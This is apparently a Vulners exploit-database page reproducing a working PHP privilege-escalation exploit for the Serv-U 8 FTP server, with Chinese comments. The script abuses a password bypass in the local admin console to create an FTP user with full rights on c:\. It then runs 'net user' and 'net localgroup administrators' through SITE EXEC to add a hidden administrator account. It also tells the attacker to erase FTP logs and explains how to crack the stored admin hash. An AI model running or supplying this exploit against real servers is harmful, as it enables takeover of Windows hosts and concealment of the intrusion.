Vulners
Lucene search
<?
/*
serv-u 8 local exp ver 1.0
如果你在自己的服务器上发现这个文件,厄。。。那太遗憾了,别来找我。
这个文件到处都是,人人都能拿到。
*/
?>
<html>
<title>Serv-u 8 local exp ver 1.0</title>
<body>
<script>
function fun_showDiv(show)
{
document.getElementById(show).style.display="block";
}
</script>
<b>Serv-u 8 local exp ver 1.0</b>
<form id="form1" name="form1" method="post" action="?">
<p><a href="#" onclick="fun_showDiv('adminpassdiv')">管理员密码</a>
<input type="text" name="admin_pwd" value="" />
</p>
<p>直接提权!
<input type="submit" name="cmd" value="提权" />
<a href="#" onclick="fun_showDiv('QAdiv')">QA</a>
</p>
<pre>
<?
//Global var
$port=43958;
$host="127.0.0.1";
$sessionid="";
$getuserid="";
$ftpport=21;
$ftpuser="lalala_hacked";
$ftppwd=$_POST['admin_pwd'];
$exec_addUser="site exec c:/windows/system32/net.exe user ".$ftpuser." ".$ftppwd." /add";
$exec_addGroup="site exec c:/windows/system32/net.exe localgroup administrators ".$ftpuser." /add";
if($_POST['cmd']) {
//login-----------------------------------------
$sock_login = fsockopen($host, $port);
$URL='/Web%20Client/Login.xml?Command=Login&Sync=1543543543543543';
$post_data_login['user'] = "";
$post_data_login['pword'] = $ftppwd;
$post_data_login['language'] = "zh%2CCN&";
$ref="http://".$host.":".$port."/?Session=39893&Language=zh,CN&LocalAdmin=1";
$postStr = createRequest($port,$host,$URL,$post_data_login,$sessionid,$ref);
fputs($sock_login, $postStr);
$result = fread($sock_login, 1280);
$sessionid = getmidstr("<sessionid>","</sessionid>",$result);
if ($sessionid!="")
echo "登陆成功!";
fclose($sock_login);
//login-----------------------------------------
//getOrganizationId-------------------------------
$OrganizationId="";
$sock_OrganizationId = fsockopen($host, $port);
$URL='/Admin/ServerUsers.htm?Page=1';
$postStr = createRequest($port,$host,$URL,"",$sessionid,"");
fputs($sock_OrganizationId, $postStr);
$resultOrganizationId="";
while(!feof($sock_OrganizationId)) {
$result = fread($sock_OrganizationId, 1024);
$resultOrganizationId=$resultOrganizationId.$result;
}
$strTmp = "OrganizationUsers.xml&ID=";
$OrganizationId = substr($resultOrganizationId,strpos($resultOrganizationId,$strTmp)+strlen($strTmp),strlen($strTmp)+15);
$OrganizationId = substr($OrganizationId,0,strpos($OrganizationId,"\""));
fclose($sock_OrganizationId);
if ($OrganizationId!="")
echo "获取OrganizationId".$OrganizationId."成功!";
//getOrganizationId-------------------------------
//getuserid---------------------------------------
$getuserid="";
$sock_getuserid = fsockopen($host, $port);
$URL="/Admin/XML/User.xml?Command=AddObject&Object=COrganization.".$OrganizationId.".User&Temp=1&Sync=546666666666666663";
$ref="http://".$host.":".$port."/Admin/ServerUsers.htm?Page=1";
$post_data_getuserid="";
$postStr = createRequest($port,$host,$URL,$post_data_getuserid,$sessionid,$ref);
fputs($sock_getuserid, $postStr);
$result = fread($sock_getuserid, 1280);
$result = getmidstr("<var name=\"ObjectID\" val=\"","\" />",$result);
fclose($sock_getuserid);
$getuserid = $result;
if ($getuserid!="")
echo "获取用户ID".$getuserid."成功!";
//getuserid---------------------------------------
//addpower-----------------------------------------
$sock_addpower = fsockopen($host, $port);
$URL="/Admin/XML/Result.xml?Command=AddObject&Object=CUser.".$getuserid.".DirAccess&Sync=1227081437828";
$post_data_addpower['Access'] = "7999";
$post_data_addpower['MaxSize'] = "0";
$post_data_addpower['Dir'] = "c:\\";
$post_data_addpower['undefined'] = "undefined";
$postStr = createRequest($port,$host,$URL,$post_data_addpower,$sessionid,"http://127.0.0.1".":".$port."/Admin/ServerUsers.htm?Page=1");
fputs($sock_addpower, $postStr,strlen($postStr));
$result = fread($sock_addpower, 1280);
fclose($sock_addpower);
echo "添加权限成功!";
//addpower-----------------------------------------
//adduser-----------------------------------------
$sock_adduser = fsockopen($host, $port);
$URL="/Admin/XML/Result.xml?Command=UpdateObject&Object=COrganization.".$OrganizationId.".User.".$getuserid."&Sync=1227071190250";
$post_data_adduser['LoginID'] = $ftpuser;
$post_data_adduser['FullName'] = "";
$post_data_adduser['Password'] = 'hahaha';
$post_data_adduser['ComboPasswordType'] = "%E5%B8%B8%E8%A7%84%E5%AF%86%E7%A0%81";
$post_data_adduser['PasswordType'] = "0";
$post_data_adduser['ComboAdminType'] = "%E6%97%A0%E6%9D%83%E9%99%90";
$post_data_adduser['AdminType'] = "";
$post_data_adduser['ComboHomeDir'] = "/c:";
$post_data_adduser['HomeDir'] = "/c:";
$post_data_adduser['ComboType'] = "%E6%B0%B8%E4%B9%85%E5%B8%90%E6%88%B7";
$post_data_adduser['Type'] = "0";
$post_data_adduser['ExpiresOn'] = "0";
$post_data_adduser['ComboWebClientStartupMode'] = "%E6%8F%90%E7%A4%BA%E7%94%A8%E6%88%B7%E4%BD%BF%E7%94%A8%E4%BD%95%E7%A7%8D%E5%AE%A2%E6%88%B7%E7%AB%AF";
$post_data_adduser['WebClientStartupMode'] = "";
$post_data_adduser['LockInHomeDir'] = "0";
$post_data_adduser['Enabled'] = "1";
$post_data_adduser['AlwaysAllowLogin'] = "1";
$post_data_adduser['Description'] = "";
$post_data_adduser['IncludeRespCodesInMsgFiles'] = "";
$post_data_adduser['ComboSignOnMessageFilePath'] = "";
$post_data_adduser['SignOnMessageFilePath'] = "";
$post_data_adduser['SignOnMessage'] = "";
$post_data_adduser['SignOnMessageText'] = "";
$post_data_adduser['ComboLimitType'] = "%E8%BF%9E%E6%8E%A5";
$post_data_adduser['LimitType'] = "Connection";
$post_data_adduser['QuotaBytes'] = "0";
$post_data_adduser['Quota'] = "0";
$post_data_adduser['Access'] = "7999";
$post_data_adduser['MaxSize'] = "0";
$post_data_adduser['Dir'] = "%25HOME%25";
$postStr = createRequest($port,$host,$URL,$post_data_adduser,$sessionid,"http://127.0.0.1".":".$port."/Admin/ServerUsers.htm?Page=1");
fputs($sock_adduser, $postStr,strlen($postStr));
$result = fread($sock_adduser, 1280);
fclose($sock_adduser);
echo "添加用户成功!";
//adduser-----------------------------------------
//exec-------------------------------
$sock_exec = fsockopen("127.0.0.1", $ftpport, &$errno, &$errstr, 10);
$recvbuf = fgets($sock_exec, 1024);
$sendbuf = "USER ".$ftpuser."";
fputs($sock_exec, $sendbuf, strlen($sendbuf));
$recvbuf = fgets($sock_exec, 1024);
$sendbuf = "PASS hahaha";
fputs($sock_exec, $sendbuf, strlen($sendbuf));
$recvbuf = fgets($sock_exec, 1024);
$sendbuf = $exec_addUser."";
fputs($sock_exec, $sendbuf, strlen($sendbuf));
$recvbuf = fread($sock_exec, 1024);
echo "执行".$exec_addUser."返回了$recvbuf";
fclose($sock_exec);
$sock_exec = fsockopen("127.0.0.1", $ftpport, &$errno, &$errstr, 10);
$recvbuf = fgets($sock_exec, 1024);
$sendbuf = "USER ".$ftpuser."";
fputs($sock_exec, $sendbuf, strlen($sendbuf));
$recvbuf = fgets($sock_exec, 1024);
$sendbuf = "PASS hahaha";
fputs($sock_exec, $sendbuf, strlen($sendbuf));
$recvbuf = fgets($sock_exec, 1024);
$sendbuf = $exec_addGroup."";
fputs($sock_exec, $sendbuf, strlen($sendbuf));
$recvbuf = fread($sock_exec, 1024);
echo "执行".$exec_addGroup."返回了$recvbuf";
fclose($sock_exec);
echo "好了,自己3389上去清理ftp用户日志吧!";
//exec-------------------------------
}
/** function createRequest
@port_post : administrator port $port=43958;
@host_post : host $host="127.0.0.1";
@URL_post : target $URL='/Web%20Client/Login.xml?Command=Login&Sync=1543543543543543';
@post_data_post : arraylist $post_data['user'] = "";...
@return httprequest string
*/
function createRequest($port_post,$host_post,$URL_post,$post_data_post,$sessionid,$referer){
$data_string="";
if ($post_data_post!="")
{
foreach($post_data_post as $key=>$value)
{
$values[]="$key=".urlencode($value);
}
$data_string=implode("",$values);
}
$request.="POST ".$URL_post." HTTP/1.1";
$request.="Host: ".$host_post."";
$request.="Referer: ".$referer."";
$request.="Content-type: application/x-www-form-urlencoded";
$request.="Content-length: ".strlen($data_string)."";
$request.="User-Agent: Serv-U";
$request.="x-user-agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; SV1; .NET CLR 1.1.4322)";
$request.="Accept: */*";
$request.="Cache-Contro: no-cache";
$request.="UA-CPU: x86";
if ($sessionid!="")
{
$request.="Cookie: Session=".$sessionid."";
}
$request.="";
$request.=$data_string."";
return $request;
}
//getMidfor2str copy from internet
function getmidstr($L,$R,$str)
{
$int_l=strpos($str,$L);
$int_r=strpos($str,$R);
If ($int_l>-1&&$int_l>-1)
{
$str_put=substr($str,$int_l+strlen($L),($int_r-$int_l-strlen($L)));
return $str_put;
}
else
return "没找到需要的变量";
}
?>
</pre>
</form>
<div id="adminpassdiv" style="display:none">
<pre>
默认为空,如果密码为空,<b>填什么都能进去。</b>
如果修改过,管理员密码默认会在这里:
<b>C:\Program Files\RhinoSoft.com\Serv-U\Users\Local Administrator Domain\.Archive</b>
文件中找到一个MD5密码值。
C:\Program Files\RhinoSoft.com\Serv-U
是su的根目录。
密码值的样式为(假设是123456)
kx#######################
#代表123456的32位MD5加密,而kx则是su对md5的密码算法改进的随机2位字符。
破解后的密码为<b>kx</b>123456,去掉kx就是密码了。
你可以针对这个加密生成字典。
</pre>
</div>
<div id="QAdiv" style="display:none">
<pre>
<b>提权的原理?</b>
Su8的管理平台是http的,继承了su7的方式。
抓包,分析,发现了以下路程是可以利用的。
1, 管理员从管理控制台打开web页面时,是不需要验证密码的。
2, 管理员如果用某URL打开web页面时,虽然需要输入密码,但是无论输入什么,都可以进入。“/?Session=39893&Language=zh,CN&LocalAdmin=1”
3, 管理员可以添加用户有两种,一种是全局用户,一种是某个域下的用户。而权限设置也是两种,一种是全局,一种是针对用户。
4, 管理员添加了用户的这个包和设置权限这个包,是分开的。
所以,我可以抓包然后转换成php的socket连接post出去。
最后在用经典的ftp登陆,exec命令。达到提权。
前面su7已经说了很多,这里简单的说下好了。
.....登陆什么的。
1,获取ID。
2,给这个id添加权限。
3,给这个id赋予用户名,密码,目录,权限。
4,登陆后执行系统命令。
<b>为啥我明明显示成功了,但是却提不上去?</b>
这要看错误代码了,这里偶很惭愧,并没有写详细的错误代码判断。
一般有以下几种情况:
1,可能是因为管理员密码不对。
参照管理员密码的连接。
2,可能是因为管理员限制了执行SITE EXEC。
有待程序修改,程序可以加一个让他不限制的功能。
3,可能是程序问题。
</pre>
</div>
</body>
</html>
Data
Build on a solid foundation with Vulners data
We provide the essential building blocks for cybersecurity solutions with comprehensive, structured, and constantly updated vulnerability and exploits data
Api
Power your application with Vulners API
The Vulners REST API offers reliable, high-performance access to vulnerability intelligence, with 99.9% SLA uptime and CDN-backed data delivery for seamless global access
App
Assess and manage vulnerabilities with Vulners tools
Built on top of Vulners' database and SDK, end-user solutions give security professionals and developers lightweight and powerful tools for vulnerability remediation
06 Aug 2009 00:00Current
7.1High risk
Vulners AI Score7.1